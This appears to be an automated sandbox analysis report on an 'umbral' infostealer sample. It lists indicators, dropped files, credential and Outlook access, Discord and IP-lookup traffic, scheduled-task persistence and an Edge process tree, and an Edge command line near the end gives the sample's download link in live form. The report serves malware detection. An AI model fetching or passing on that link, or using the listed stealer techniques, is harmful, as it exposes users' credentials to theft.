umbral | hxxps://gofile[.]io/d/a2R6t1

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	xdwdNode.js.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe

Executes dropped EXE 5 IoCs

pid	Process
5100	BootstrapperNew.exe
1816	tjktyptw.kq5.exe
3988	3kjenos5.dav.exe
3696	xdwdNode.js.exe
752	xdwdWireshark Host.exe

Loads dropped DLL 64 IoCs

pid	Process
724	taskmgr.exe
4436	Process not Found
60	Process not Found
2716	WmiApSrv.exe
3560	Process not Found
1580	Process not Found
2432	Process not Found
3080	Process not Found
3048	Process not Found
3432	Process not Found
4044	Process not Found
1760	Process not Found
3080	Process not Found
1408	Process not Found
2008	Process not Found
3676	Process not Found
1232	Process not Found
3516	Process not Found
4472	Process not Found
4824	Process not Found
1688	Process not Found
3460	Process not Found
1904	Process not Found
3576	Process not Found
2960	Process not Found
4168	Process not Found
4484	Process not Found
3672	Process not Found
2092	Process not Found
2480	Process not Found
4804	msedge.exe
3352	Process not Found
4340	Process not Found
1656	Process not Found
1580	Process not Found
1952	Process not Found
4164	Process not Found
4424	Process not Found
2796	Process not Found
3960	Process not Found
4608	Process not Found
3628	Process not Found
4076	Process not Found
1464	Process not Found
2652	Process not Found
3060	Process not Found
1116	Process not Found
4232	Process not Found
4804	Process not Found
3352	Process not Found
5052	Process not Found
1952	Process not Found
2848	Process not Found
4516	Process not Found
4484	Process not Found
4400	Process not Found
840	Process not Found
1052	Process not Found
436	powershell.exe
2092	Process not Found
1816	tjktyptw.kq5.exe
5112	Process not Found
1932	Process not Found
2176	powershell.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BootstrapperNew.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BootstrapperNew.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BootstrapperNew.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
67	discord.com
68	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	icanhazip.com
62	ip-api.com

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\xdwdWireshark Host.exe	BootstrapperNew.exe
File opened for modification	C:\Program Files\xdwdWireshark Host.exe	BootstrapperNew.exe
File opened for modification	C:\Program Files\xdwdWireshark Host.exe	xdwdNode.js.exe
File opened for modification	C:\Program Files\xdwdWireshark Host.exe	xdwdWireshark Host.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	BootstrapperNew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3336	cmd.exe
5052	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	BootstrapperNew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	BootstrapperNew.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
4576	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	xdwdNode.js.exe
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 332640.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5052	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
952	schtasks.exe
1996	schtasks.exe
1656	schtasks.exe
1688	schtasks.exe
3516	schtasks.exe
5104	schtasks.exe
3092	schtasks.exe
4044	schtasks.exe
3812	schtasks.exe
1840	schtasks.exe
2604	schtasks.exe
556	schtasks.exe
4236	schtasks.exe
2008	schtasks.exe
452	schtasks.exe
2956	schtasks.exe
3360	schtasks.exe
2176	schtasks.exe
3204	schtasks.exe
2324	schtasks.exe
3332	schtasks.exe
1996	schtasks.exe
4648	schtasks.exe
4848	schtasks.exe
1520	schtasks.exe
1124	schtasks.exe
924	schtasks.exe
3616	schtasks.exe
884	schtasks.exe
3460	schtasks.exe
4868	schtasks.exe
412	schtasks.exe
3256	schtasks.exe
3312	schtasks.exe
4964	schtasks.exe
2360	schtasks.exe
3240	schtasks.exe
4756	schtasks.exe
2260	schtasks.exe
1136	schtasks.exe
3204	schtasks.exe
3736	schtasks.exe
4864	schtasks.exe
3736	schtasks.exe
3580	schtasks.exe
1972	schtasks.exe
1128	schtasks.exe
4020	schtasks.exe
2440	schtasks.exe
1580	schtasks.exe
4888	schtasks.exe
5024	schtasks.exe
2784	schtasks.exe
2616	schtasks.exe
3516	schtasks.exe
1220	schtasks.exe
1428	schtasks.exe
4584	schtasks.exe
764	schtasks.exe
5112	schtasks.exe
2216	schtasks.exe
3360	schtasks.exe
1824	schtasks.exe
3556	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
624	msedge.exe
624	msedge.exe
2936	msedge.exe
2936	msedge.exe
1596	identity_helper.exe
1596	identity_helper.exe
4500	msedge.exe
4500	msedge.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
724	taskmgr.exe
2716	WmiApSrv.exe
2716	WmiApSrv.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
5100	BootstrapperNew.exe
5100	BootstrapperNew.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5100	BootstrapperNew.exe
Token: SeDebugPrivilege	724	taskmgr.exe
Token: SeSystemProfilePrivilege	724	taskmgr.exe
Token: SeCreateGlobalPrivilege	724	taskmgr.exe
Token: 33	724	taskmgr.exe
Token: SeIncBasePriorityPrivilege	724	taskmgr.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	1816	tjktyptw.kq5.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeIncreaseQuotaPrivilege	2948	wmic.exe
Token: SeSecurityPrivilege	2948	wmic.exe
Token: SeTakeOwnershipPrivilege	2948	wmic.exe
Token: SeLoadDriverPrivilege	2948	wmic.exe
Token: SeSystemProfilePrivilege	2948	wmic.exe
Token: SeSystemtimePrivilege	2948	wmic.exe
Token: SeProfSingleProcessPrivilege	2948	wmic.exe
Token: SeIncBasePriorityPrivilege	2948	wmic.exe
Token: SeCreatePagefilePrivilege	2948	wmic.exe
Token: SeBackupPrivilege	2948	wmic.exe
Token: SeRestorePrivilege	2948	wmic.exe
Token: SeShutdownPrivilege	2948	wmic.exe
Token: SeDebugPrivilege	2948	wmic.exe
Token: SeSystemEnvironmentPrivilege	2948	wmic.exe
Token: SeRemoteShutdownPrivilege	2948	wmic.exe
Token: SeUndockPrivilege	2948	wmic.exe
Token: SeManageVolumePrivilege	2948	wmic.exe
Token: 33	2948	wmic.exe
Token: 34	2948	wmic.exe
Token: 35	2948	wmic.exe
Token: 36	2948	wmic.exe
Token: SeIncreaseQuotaPrivilege	2948	wmic.exe
Token: SeSecurityPrivilege	2948	wmic.exe
Token: SeTakeOwnershipPrivilege	2948	wmic.exe
Token: SeLoadDriverPrivilege	2948	wmic.exe
Token: SeSystemProfilePrivilege	2948	wmic.exe
Token: SeSystemtimePrivilege	2948	wmic.exe
Token: SeProfSingleProcessPrivilege	2948	wmic.exe
Token: SeIncBasePriorityPrivilege	2948	wmic.exe
Token: SeCreatePagefilePrivilege	2948	wmic.exe
Token: SeBackupPrivilege	2948	wmic.exe
Token: SeRestorePrivilege	2948	wmic.exe
Token: SeShutdownPrivilege	2948	wmic.exe
Token: SeDebugPrivilege	2948	wmic.exe
Token: SeSystemEnvironmentPrivilege	2948	wmic.exe
Token: SeRemoteShutdownPrivilege	2948	wmic.exe
Token: SeUndockPrivilege	2948	wmic.exe
Token: SeManageVolumePrivilege	2948	wmic.exe
Token: 33	2948	wmic.exe
Token: 34	2948	wmic.exe
Token: 35	2948	wmic.exe
Token: 36	2948	wmic.exe
Token: SeIncreaseQuotaPrivilege	3556	wmic.exe
Token: SeSecurityPrivilege	3556	wmic.exe
Token: SeTakeOwnershipPrivilege	3556	wmic.exe
Token: SeLoadDriverPrivilege	3556	wmic.exe
Token: SeSystemProfilePrivilege	3556	wmic.exe
Token: SeSystemtimePrivilege	3556	wmic.exe
Token: SeProfSingleProcessPrivilege	3556	wmic.exe
Token: SeIncBasePriorityPrivilege	3556	wmic.exe
Token: SeCreatePagefilePrivilege	3556	wmic.exe
Token: SeBackupPrivilege	3556	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe

Suspicious use of SendNotifyMessage 61 IoCs

pid	Process
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe
724	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 1304	2936	msedge.exe	81
PID 2936 wrote to memory of 1304	2936	msedge.exe	81
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 1600	2936	msedge.exe	82
PID 2936 wrote to memory of 624	2936	msedge.exe	83
PID 2936 wrote to memory of 624	2936	msedge.exe	83
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84
PID 2936 wrote to memory of 1228	2936	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1252	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BootstrapperNew.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BootstrapperNew.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/a2R6t1
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdbac446f8,0x7ffdbac44708,0x7ffdbac44718
  2⤵
  PID:1304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
  2⤵
  PID:1228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:4048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6188 /prefetch:8
  2⤵
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4500
